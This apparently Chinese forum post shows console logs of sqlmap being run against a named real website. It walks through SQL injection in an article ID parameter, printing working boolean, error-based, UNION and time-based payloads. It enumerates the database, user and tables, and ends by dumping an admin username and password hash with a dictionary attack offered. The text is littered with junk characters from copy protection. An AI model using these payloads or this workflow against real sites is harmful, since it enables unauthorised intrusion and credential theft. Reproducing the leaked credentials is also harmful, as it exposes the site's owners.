D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
; h$ M% X# A! |4 K, ?ms "Mysql" --current-user /* 注解:获取当前用户名称5 g2 k8 }1 @' G% z
sqlmap/0.9 - automatic SQL injection and database takeover tool1 Z: v l5 B) M
http://sqlmap.sourceforge.net starting at: 16:53:54
7 Q: N; V \: @[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as& s, x( H' M7 n0 D, i
session file! Q& r- S/ e7 ?+ i
[16:53:54] [INFO] resuming injection data from session file' Y! M4 K: g) D1 o" ]
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file) y( p2 w, ~5 v9 S
[16:53:54] [INFO] testing connection to the target url; T2 {8 c4 ~2 [+ w1 i' n9 s
sqlmap identified the following injection points with a total of 0 HTTP(s) reque4 p* W x3 C) @5 A4 O( H' |: F
sts:
! _& B1 \+ |6 T$ {---2 }# S# Z9 T! |7 [% r" |
Place: GET
6 M) \# |. s4 v; i; C4 ?8 T( EParameter: id
! B& C* n% c) u! J Type: boolean-based blind
* `8 K; a6 e1 m0 g Title: AND boolean-based blind - WHERE or HAVING clause7 A5 x9 d2 \" G& }" o
Payload: id=276 AND 799=799
+ q& i3 E7 N9 M3 M5 G" E Type: error-based
2 `) L' U% } r0 J* {( \ Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
7 T2 }. u) A, ]' n Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,. V7 {2 N4 }& W( E! h
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
7 ~5 i, V$ i0 L. ^+ J6 f* F),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)+ }! P, O: B& D, h2 S2 W/ V) M. s
Type: UNION query
. c. N" N) m4 E. R4 [2 F Title: MySQL UNION query (NULL) - 1 to 10 columns
' u' w6 c- [0 H, F5 X5 ^1 W4 M# \ Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR0 l0 c+ p4 o0 W
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
q b+ e/ a9 d+ F. u# ]1 V. `CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
* m, Z8 C! V/ Q v i4 [, s( p0 A Type: AND/OR time-based blind
& w: u/ Z$ j+ U+ o: P) E Title: MySQL > 5.0.11 AND time-based blind$ f8 }$ |+ i1 C; W% q5 y
Payload: id=276 AND SLEEP(5)" ]/ D1 Y% v6 \: c9 w3 h
---
, v4 @; x* F; n[16:53:55] [INFO] the back-end DBMS is MySQL$ [1 x' d8 N; R P
web server operating system: Windows' F9 Q# W. U0 `- u) f$ J
web application technology: Apache 2.2.11, PHP 5.3.05 K3 Q" r" `0 S
back-end DBMS: MySQL 5.0- V5 r( S" d% d& q, k$ ~5 j
[16:53:55] [INFO] fetching current user
" \' t% s) c! d2 ~6 W( A: qcurrent user: 'root@localhost'
+ |2 t) r: G7 q0 W& P8 e/ Z% |[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
2 C5 V/ Q" ~) Z \4 z8 Ntput\www.wepost.com.hk' shutting down at: 16:53:58
( A% J# N+ i0 O' M+ o
2 q: n2 T1 b) l3 N/ Z8 J, ^/ aD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
: ~+ i$ m0 r4 z2 _1 Q" dms "Mysql" --current-db /*当前数据库
5 A; A9 R% u3 d$ N1 f sqlmap/0.9 - automatic SQL injection and database takeover tool
) r: x; t# t; P* c; F+ k http://sqlmap.sourceforge.net starting at: 16:54:16
: l) F1 i3 J) |* }# E% A% c[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
" U4 f' L4 `5 s! S session file2 {# F& `2 B% u7 {; i W
[16:54:16] [INFO] resuming injection data from session file
* T% W6 Z q$ a( p[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file+ t% l% s+ l% g( f
[16:54:16] [INFO] testing connection to the target url5 `1 z: d7 U1 l* X- d) r
sqlmap identified the following injection points with a total of 0 HTTP(s) reque0 `3 |% r# e! h4 O
sts:
' t' N D4 Z4 H _1 C---
& \: c2 o$ I8 s1 s5 f: DPlace: GET
' Z# s: l; [6 }/ G2 X$ U! l) XParameter: id2 A3 v# x4 X0 x/ x
Type: boolean-based blind$ {2 ^6 m5 m9 N4 W$ j
Title: AND boolean-based blind - WHERE or HAVING clause
+ F0 W3 R1 `6 ^4 Z" H" s {" h2 [ Payload: id=276 AND 799=799
; R2 | A P5 |0 H4 a! t% F Type: error-based
6 f, I7 t/ u5 \4 o7 Y; J/ c Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- v; |7 v' _7 g8 T( ]. }' L( f Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
& t/ o$ X! }) i+ K+ C120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
# x+ |6 c, J& y),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) k1 ^6 F8 k: Z* k6 F
Type: UNION query
- n/ Q0 i% f5 W( {" h Title: MySQL UNION query (NULL) - 1 to 10 columns
2 ^% \4 a0 P# c& I( x0 U1 F Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR9 g) G v6 U: u9 w$ A+ R
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
0 I0 b7 }# ^& D% o9 xCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#5 x$ U3 o9 L+ M6 f, D1 ^
Type: AND/OR time-based blind% g9 ]; N) E" Q( }$ f
Title: MySQL > 5.0.11 AND time-based blind
3 R3 t0 n5 h- J# }2 F' l Payload: id=276 AND SLEEP(5)! E# L8 @$ ^/ B% S' |+ ]) v- i b
---1 X O& Q) e3 F% T
[16:54:17] [INFO] the back-end DBMS is MySQL
: G9 \8 A+ D3 s! A4 W0 o4 r$ Pweb server operating system: Windows
8 K6 g5 g0 s, Eweb application technology: Apache 2.2.11, PHP 5.3.0. v) d1 j% E9 ?6 I7 S, R x# q
back-end DBMS: MySQL 5.0
7 i% o' K9 T9 } n[16:54:17] [INFO] fetching current database
1 n) J7 ~; P& r3 S* ~$ z0 E! S9 ]7 ]1 tcurrent database: 'wepost'8 W; |- |& N( s
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou7 {3 k! S9 [5 s5 u
tput\www.wepost.com.hk' shutting down at: 16:54:18& b; D4 S/ P3 V8 P9 C6 C$ E
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db6 |8 P [9 }2 t
ms "Mysql" --tables -D "wepost" /*获取当前数据库的表名
) @6 i' }9 P) N' V$ Y; i: ? sqlmap/0.9 - automatic SQL injection and database takeover tool' k B6 `2 N* P; {; R9 V$ Q
http://sqlmap.sourceforge.net starting at: 16:55:253 i" f* R% ]4 s1 o9 y- m1 ~
[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as) W$ K9 v, a" d0 h
session file
' B3 Z" K1 q$ \[16:55:25] [INFO] resuming injection data from session file
. G. c: G) w9 n9 Z) D& ~[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
7 ?" p* F4 j+ ?[16:55:25] [INFO] testing connection to the target url
$ b; T- c! ^) K# c _sqlmap identified the following injection points with a total of 0 HTTP(s) reque
, Z2 ^6 _% y1 Ists:) b% f/ L- {3 h
---
% z }7 s( l4 V @4 o% m+ h O( E2 o$ {Place: GET3 F) c/ j* Q& U
Parameter: id
" B4 ~' e9 H3 t# t% Q Type: boolean-based blind4 c: k& ^+ H2 k# U, ^
Title: AND boolean-based blind - WHERE or HAVING clause
9 {) C8 v( y c Payload: id=276 AND 799=799
0 y" m K; v: R1 P$ l Type: error-based9 N% P5 Q6 E1 L6 S& V9 k. ?; M
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause( T5 L3 d. D! y" q" w5 `; n7 N1 z8 `" R* w
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
4 w/ y3 v0 a; Z# T: [! S8 u120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
7 J& G) S; B9 ^1 A; V" k6 o),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)& k/ A) }/ U/ }0 T1 Z- {
Type: UNION query! f$ F: `5 C" v" o" ^
Title: MySQL UNION query (NULL) - 1 to 10 columns
; u7 z6 H+ Z1 X7 Q Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
F1 O, C3 y7 n7 t; V- S5 }3 y(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),$ S4 o- c. W1 o, M( E
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#; a$ ^' X+ x! j$ L5 Q6 S3 L v% C
Type: AND/OR time-based blind
* r1 }4 i5 m3 X7 {" b9 V( y6 d Title: MySQL > 5.0.11 AND time-based blind7 d$ x v& D" m& R6 t# E. ^ f9 Z
Payload: id=276 AND SLEEP(5)
/ k# I. b. N+ M/ u1 D1 h+ W---
/ Z3 l3 \- [! O7 r% L9 h) q[16:55:26] [INFO] the back-end DBMS is MySQL
2 @" g: a4 S. K7 \' P( Rweb server operating system: Windows
1 a/ M+ I: ]! y4 iweb application technology: Apache 2.2.11, PHP 5.3.0
# w- J0 Z c5 X: E7 ]' eback-end DBMS: MySQL 5.0
# W0 e4 j7 f+ i/ d! a: w/ P' b[16:55:26] [INFO] fetching tables for database 'wepost' a' I; \- G8 t3 m
[16:55:27] [INFO] the SQL query used returns 6 entries+ \" l1 G; @' C6 x+ T
Database: wepost
6 c$ N8 f' ?6 b! E4 B* L/ Y[6 tables]; V4 e! r: |/ h' O/ y
+-------------+
5 z1 F$ b' i$ _' L| admin |
4 e: p9 G" a5 U" m; ^* M| article |
& K; x( h$ r- ^' j| contributor |
9 C$ H3 q+ w( A' y( Q- N9 m| idea |
8 z. f/ _" l B& x; [! M3 t| image |+ b+ I8 T; |/ \% I) g1 S2 K, W' T
| issue |
( K9 h: l) T; P+-------------+
0 X+ f _! O$ z+ f6 I: s- L[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou# [! C; u# z" F: \& U
tput\www.wepost.com.hk' shutting down at: 16:55:33
- c. }7 T4 e$ V! j. U. Z7 b: M2 q* v& ~6 I: n
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
5 Z x& E+ ? S1 o+ J9 {$ M% t( hms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名& a9 R# B, x: K+ W) E4 T: H
sqlmap/0.9 - automatic SQL injection and database takeover tool
9 [! x. R4 a+ O2 N http://sqlmap.sourceforge.net starting at: 16:56:06
0 X/ U% j4 l) j: p( Vsqlmap identified the following injection points with a total of 0 HTTP(s) reque
! `7 W+ e. _3 gsts:: H$ I) p6 y8 @& _: G
---# _# l' i* y5 A5 d$ o% ~+ \
Place: GET
: y g, T' @# u D# N+ Y; A; U/ pParameter: id* a. U1 j1 \+ _% k
Type: boolean-based blind* E3 R0 g j7 c8 K
Title: AND boolean-based blind - WHERE or HAVING clause
* i; l7 h: V: [" a3 B Payload: id=276 AND 799=799
; R9 |& t3 g/ D$ D0 ] Type: error-based6 c+ q7 e; W" ]. B# j% \' [( ^
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
7 c4 [( e, \3 O# q8 x g0 G Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,6 H: Z5 v2 ~& Q' Y
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58 ]2 O0 z! Y' ^ z7 r* B
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
. ?' s+ J2 {3 |; X% q1 T$ F( Z6 f Type: UNION query7 F$ k4 M& C# {! n+ A( ^7 n
Title: MySQL UNION query (NULL) - 1 to 10 columns
( C7 L g5 z2 B Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR4 n6 n$ X; _; i! G4 x! m
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),& i. ?' x! M O9 Q d& c+ k
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#) q5 P( U, M- k5 A7 ?9 `2 K
Type: AND/OR time-based blind
; r s/ V2 P) C% y Title: MySQL > 5.0.11 AND time-based blind
5 H9 ]6 N" O* n* y) g1 L* H4 c1 @ Payload: id=276 AND SLEEP(5)
, O# q$ f4 F2 H9 A# l---1 s& `& v& M) a: c
web server operating system: Windows6 j2 B1 ` V* Y3 @4 \- ]5 m8 N' R
web application technology: Apache 2.2.11, PHP 5.3.0' j/ h. f/ f* L% i& q+ s- I
back-end DBMS: MySQL 5.0
% W$ w0 f/ r* U1 [& ~2 {[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
, ~; B5 C. ~- l( gssion': wepost, wepost3 h* \' @( U' H l
Database: wepost
% V/ x: n- [2 @3 H TTable: admin
' h C/ n- d$ d/ I W[4 columns]! M- g2 u* a0 G9 g
+----------+-------------+
2 m+ b: W! t) b( H' ~| Column | Type |
; ]4 D' P! T5 C& _6 r' ]+ Z& m+----------+-------------+
0 G5 |6 H% |( _' A/ z2 I c6 ]| id | int(11) |( _0 T5 a- R/ v# o+ B3 `7 P/ a
| password | varchar(32) |$ s& X0 h% c. r
| type | varchar(10) |& l2 }: p) E' _6 i
| userid | varchar(20) |# i: S; ~) ^1 T6 G
+----------+-------------+. L4 ~7 ~1 e$ S) O- U* v' H
shutting down at: 16:56:19
H: |$ \1 `) w
1 ]8 d7 `5 v) [9 [+ K' h5 L" l) LD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db, W9 y$ w2 \8 E7 V1 ?
ms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容9 O, h* _/ a' h2 b: Q
sqlmap/0.9 - automatic SQL injection and database takeover tool+ J/ c4 G* S7 M: u' O! h
http://sqlmap.sourceforge.net starting at: 16:57:143 M, q0 `" ?; k
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
( [$ e: C1 g6 Wsts:% o4 A5 c5 K0 `3 M( |" M
---& ^9 e% F: N/ C
Place: GET
4 \* ^2 l+ b/ z3 l, hParameter: id
! L; n- a" h) B Type: boolean-based blind! y' w3 A' L4 o- [' U9 w
Title: AND boolean-based blind - WHERE or HAVING clause
" \: j6 } @ v4 M3 K* ?/ O, c% ? Payload: id=276 AND 799=799& k7 n! B' r* u( a
Type: error-based
% U3 e! K" p! Y2 e- |4 t' m, ` Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause5 i$ v" m$ P& \4 D3 p
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
9 N. J- e1 k. @. O120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,589 l/ w" n4 q2 Y! F! X) u
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)) O0 v# C) f; O- s, V+ i
Type: UNION query$ H- W/ B7 m" l7 r
Title: MySQL UNION query (NULL) - 1 to 10 columns; M3 [1 w( m0 E/ D) j5 `7 H5 a# y
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR8 C& x( @* D- ~# C; B3 |
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
6 P: j8 [+ I8 a `" DCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#( ^( S! [6 U s5 t1 _. p
Type: AND/OR time-based blind$ G6 E3 `! \& I7 r, V6 N$ x/ I1 m
Title: MySQL > 5.0.11 AND time-based blind8 p6 x/ Q1 f2 |! L" p) e
Payload: id=276 AND SLEEP(5)
* |( k6 r4 Y. v: ]/ j3 V5 q- ~---7 V' u' G" Q; t: l" K
web server operating system: Windows9 ~$ ~ U; @$ E: V$ p; P
web application technology: Apache 2.2.11, PHP 5.3.06 e" y+ X7 p! a
back-end DBMS: MySQL 5.0
5 y0 b: v6 t, f9 w4 I& Trecognized possible password hash values. do you want to use dictionary attack o; g5 N8 g, H; e* e4 q I2 {! ?5 X
n retrieved table items? [Y/n/q] y
/ X9 J m/ V6 ?. W+ c6 Twhat's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]2 r% n/ t" l7 {/ K! ^
do you want to use common password suffixes? (slow!) [y/N] y& k, v; E7 ]8 W1 o
Database: wepost5 V; F$ Y4 W% [" O
Table: admin u& z; o4 v' L1 @$ h) |
[1 entry]
2 v( r) l3 i$ g U+----------------------------------+------------+
8 c3 m n5 q2 n# r; d( ? C" ]. S| password | userid |1 M0 M8 {; a5 k$ _
+----------------------------------+------------+
! K! W. D; a3 J% m* u| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |5 \6 M1 q* E- a: n: l7 P
+----------------------------------+------------+: P: [1 I/ V4 T _) k& ^
shutting down at: 16:58:14# Y1 J0 `5 e0 o+ K' l4 g
. w7 m' c, n# J5 i# p; F
D:\Python27\sqlmap> |
发表于 2013-4-4 22:18:49
收藏
支持
反对